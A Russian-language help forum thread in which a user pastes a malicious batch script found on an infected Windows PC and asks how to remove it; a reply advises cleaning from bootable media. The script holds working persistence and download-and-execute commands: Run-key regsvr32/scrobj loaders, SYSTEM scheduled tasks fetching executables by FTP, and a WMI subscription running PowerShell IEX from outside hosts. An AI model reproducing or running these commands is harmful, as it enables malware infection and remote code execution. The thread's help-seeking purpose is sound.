Sasha_Odesskiy
@Sasha_Odesskiy
бла-бла-бла!

Откуда берётся эта задача?

Здравствуйте. Второй день не могу работать вообще. Вроде нечего не устанавливал, вылетает всё время окно где пишется сообщение "Не удаётся найти С:\\ProgramData\temp\rtx.exe.
Зашёл в папку ":С:\\ProgramData\temp\" там есть файл 1start.bat с следующим содержанием:
"reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:js.webpublicservices.org:280/v1.sct scrobj.dll" /f
reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:js.ha7455h6fi1.net:280/v1.sct scrobj.dll" /f
reg delete HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run /v "Realtek HD Audio" /f

schtasks /create /tn "AdobeUpdateFlac" /tr "cmd /c echo open ftp.ha7455h6fi1.net>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe" /ru "system" /sc onstart /F
schtasks /create /tn "AdobeUpdateFlac2" /tr "cmd /c echo open ftp.ha7455h6fi1.net>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe" /ru "system" /sc onstart /F

schtasks /create /tn "OSUpdate" /tr "cmd /c echo open ftp.webpublicservices.org>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
Я удалял уже через regedit эту задачу. Удалял с Планировщика заданий. Вроде бы сработало. Сегодня захожу. Стало каждые 5-10 секунд вылетать то окно. Что делать?

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="adobflac3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 13000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="adobflac4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('wmi.geaohgoehagugeh.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('ha7455h6fi1.net:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('ha7455h6fi1.net:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('ha7455h6fi1.net:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('wmi.webpublicservices.org:8205/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('ha7455h6fi1.net:8095/power.txt')||regsvr32 /u /s /i:ha7455h6fi1.net:8204/s.txt scrobj.dll&regsvr32 /u /s /i:ha7455h6fi1.net:8205/s.txt scrobj.dll&regsvr32 /u /s /i:wmi.webpublicservices.org:8221/s.txt scrobj.dll&regsvr32 /u /s /i:ha7455h6fi1.net:8096/s.txt scrobj.dll&regsvr32 /u /s /i:ha7455h6fi1.net:8095/s.txt scrobj.dll&regsvr32 /u /s /i:wmi.geaohgoehagugeh.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://ha7455h6fi1.net:8220/s.xsl\""

cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"adobflac3\"", Consumer="CommandLineEventConsumer.Name=\"adobflac4\""

taskkill /f /im taskhostw.exe
taskkill /f /im winlogon.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhostw.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
cacls c:\ProgramData\RealtekHD\winlogon.exe /e /d system
cacls c:\ProgramData\RealtekHD\taskhostw.exe /e /d system
"
  • Вопрос задан
  • 1100 просмотров
Решения вопроса 1
@kalapanga
Проблема в том, что Вы пытаетесь лечиться из под зараженной ОС. В зависимости от "качества" зловреда это может оказаться от сложно до невозможно. Он тут же восстанавливается. Как минимум от сети отключиться надо.
Можно лечить такую заразу руками, но загрузившись с какой-нибудь "ремонтной" флешки. Ну или антивирус запустите, лучше тоже с загрузочного носителя.
Ответ написан
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы